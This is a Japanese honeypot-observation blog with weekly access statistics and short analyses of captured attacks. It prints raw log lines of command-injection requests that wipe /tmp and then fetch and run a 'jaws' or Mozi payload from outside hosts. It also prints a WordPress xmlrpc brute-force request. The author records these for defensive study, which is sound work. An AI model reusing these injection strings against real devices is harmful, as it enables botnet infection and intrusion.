ハニーレポート

ハニーポット観測レポートを中心に書いていきます。

週刊ハニーレポート3月27日号

3月20日〜3月27日までのハニーポットへのアクセスレポート。

 

アクセス数

週刊アクセス数です。
今週は100程度のアクセスがデイリーでありました。
3月26日(土)に600アクセスを超えました。

f:id:darjring:20220327215221p:plain

アクセス数

 

 

ipアドレス別アクセス数

31.184.197.10のアクセスが600近くありますね。
おそらく、3月26日のアクセスはこのipアドレスによるものでしょう。
ちなみに31.184.197.10はロシアからのアクセスです。

inetnum: 31.184.192.0 - 31.184.199.255
netname: PIN-DATACENTER-NET
descr: public vlans of DC
country: RU   
→ (ロシア連邦
org: ORG-PINl1-RIPE
admin-c: PIN44050-RIPE
tech-c: PIN44050-RIPE
mnt-routes: MNT-PINSUPPORT
status: ASSIGNED PA
mnt-by: MNT-PIN
mnt-domains: MNT-PINSUPPORT
mnt-by: MNT-PINSUPPORT
created: 2015-07-19T21:06:36Z l
ast-modified: 2019-02-28T11:13:27Z
source: RIPE

f:id:darjring:20220327215312p:plain

ipアドレスカウント

 

HTTPリクエストメソッド

HEADメソッドが最も多いです。
しっかりとヘッダ情報を見てからの攻撃をしているケースが今週は多いです。
CONNECT、GETも多いアクセスの週となりました。

f:id:darjring:20220327215101p:plain

HTTPステータスコード

401のアクセスが多く権限奪取が多そうです。

f:id:darjring:20220327215707p:plain

ステータスコード

 

HTTP アクセスURL数

 

f:id:darjring:20220327215850p:plain

URL

ハニーポット参考書籍

 

 

 

週刊ハニーレポート3/20日号

3月15日〜3月20日のハニーポットのログのサマリーをレポートします。

 

デイリーアクセス

3月16日、17日にアクセスが急激に多くなりました。

f:id:darjring:20220321210829p:plain

 

HTTPアクセス

f:id:darjring:20220321210746p:plain

HTTPステータスコード

401と200が多いですね。
権限奪取系と何らかのリクエストによるインジェクションが多かったのでしょう。

f:id:darjring:20220321210748p:plain

HTTPリクエス

PUT、HEAD、GETが多いですね。

f:id:darjring:20220321210751p:plain

ipアドレス別アクセス数トップ10

ちなみに最も多いアクセスのipアドレス85.113.44.207はロシアからのアクセスです。

 

from_ip_adress

85.113.44.207

2001

218.93.8.14

1625

20.228.192.2

132

45.146.165.37

44

31.210.20.89

34

109.237.103.123

22

103.156.90.65

21

37.0.15.238

17

109.237.96.124

17

109.237.103.9

16

f:id:darjring:20220321210826p:plain

 

ハニーポット参考書籍

このハニーポットは下記書籍を参考にして作成しました。

 

 

wgetしてくるやつを抽出するよ!

ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。
しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事によりログ分析ができていませんでした。
そのため、現時点で3日分のログしか溜まっていません(えっ!?

それでも、すでに数千アクセス来ているのでログを見ていこうと思います。

今日は、wgetしてくる攻撃をピンポイントで抽出します。
ログファイルを書きコマンドで抽出します。[1]

$ grep -i wget access_log

結果

検索件数:10件

[2022-03-15 13:14:01+0900] 114.226.253.242 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国:中国

[2022-03-15 14:34:46+0900] 203.150.51.169 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国:タイ

[2022-03-16 06:10:01+0900] 131.0.140.63 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国:アメリカ(国情報なし)

[2022-03-16 15:57:33+0900] 124.152.185.167 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+209.141.59.94/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国:中国

[2022-03-16 17:58:34+0900] 189.124.119.77 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国:アメリカ(国情報なし)

[2022-03-16 18:39:56+0900] 41.237.6.136 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+%20jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国:エジプト

[2022-03-17 09:28:28+0900] 41.44.63.246 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+%20jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国:エジプト

[2022-03-17 15:03:33+0900] 45.224.170.52 blank:80 "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.224.170.52:57274/Mozi.m+-

ipアドレスの国:アメリカ(国情報なし)

[2022-03-17 18:09:42+0900] 187.144.73.98 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

 ipアドレスの国:メキシコ

[2022-03-17 19:15:47+0900] 106.253.189.123 127.0.0.1:80 "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 200 False 

ipアドレスの国:韓国

ipアドレスの国を調べるとさまざまな国から攻撃を受けています。
中国、アメリカ、アフリカ、タイ、韓国とバラエティに富んでいます。
今回の攻撃は、wgetマルウェアかなんかをダウンロードして仕込もうとしています。
wgetの前に必ずcd+/tmp;rm+-rf+*;があるのは、アタックした痕跡を消しにかかっています。
ここらへんはもうテンプレの攻撃でしょうね。
しかも、wgetにはjawsの文字列が必ずあります。
これはHTTPのコマンドインジェクションのようです。[2]

こんな感じでハニーポットのログ分析で攻撃の観測をレポートしていきます。

 

参考記事

[1] grepコマンドの詳細まとめました【Linuxコマンド集】

[2]複数の脆弱性を利用してルータやデバイスを狙うボット型マルウェアの新亜種を確認 | トレンドマイクロ セキュリティブログ

 

ハニーポット関連書籍

ハニーポットを作ってみたい場合は下記書籍を参考にすると良いと思います。

 

3/3の攻撃ログ分析 xmlのメッセージの中に禁止用語が!

今日来た攻撃の中から1件取り出して分析します。

今日来たアクセスのデータは以下になります。

アクセスログデータ

POST /xmlrpc.php HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0

Content-Length: 481

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

Connection: close

 

<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>F*uckYou</string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>

 

ログ内容

POSTのxmlrpc.phpWordPress脆弱性をついた攻撃のようです。[1]
WordPressに対する攻撃は多くあります。
php関係アクセスは他にも多く、脆弱性を突く攻撃は多いです。
WordPressはよく独自のブログやWebサイトを作成する際に簡単に作れることでよく使われます。
便利なツールだけに攻撃対象にもなりやすいので利用する際は気をつけたいですね。


ユーザエージェント部分はFirfox/62.0だいぶ古いですね。
2018年くらいのバージョンのようです[2]。

最後のxml記述の部分はRPCを使った攻撃のようです。
検索してみるとブルートフォース攻撃としても使われることがあるようです[3]。

xmlの記述部分のメッセージに<string>F*uckYou</string>とありますね。
暴言吐かれています。
Fとuの間に*を入れて禁句表現のフィルタから避けるようにしているのでしょうか。
文字を*で隠さないあたりが嫌ですね。

メッセージの中に禁止用語があった、WordPress脆弱性をつく攻撃でした。

 

参考記事

[1]

kinsta.com

[2]

forest.watch.impress.co.jp

[3]

blog.cloudflare.com

 

ハニーポット参考書籍

 

 

やってしまったぁぁぁぁ!

月初めでログを集計するスクリプトが動いてるか確認する時に間違えて、コマンドを打ってしまいログが消えました・・・

上ボタンで過去に打ったコマンドを使おうとして、放ったコマンド。

$ sed -i '' -e 'd' hoge.txt

ログファイルが消えてった・・・・

今月のログ集計は諦めて、また今日からログを取ってレポートしていきますT T

サーバーがパンクするほど1月ではログ溜まらないから、集計して取った段階で手動でログをリフレッシュするほうが良いかと反省。

 

みなさんも気をつけましょう!!

バックアップは大事!!

参考書籍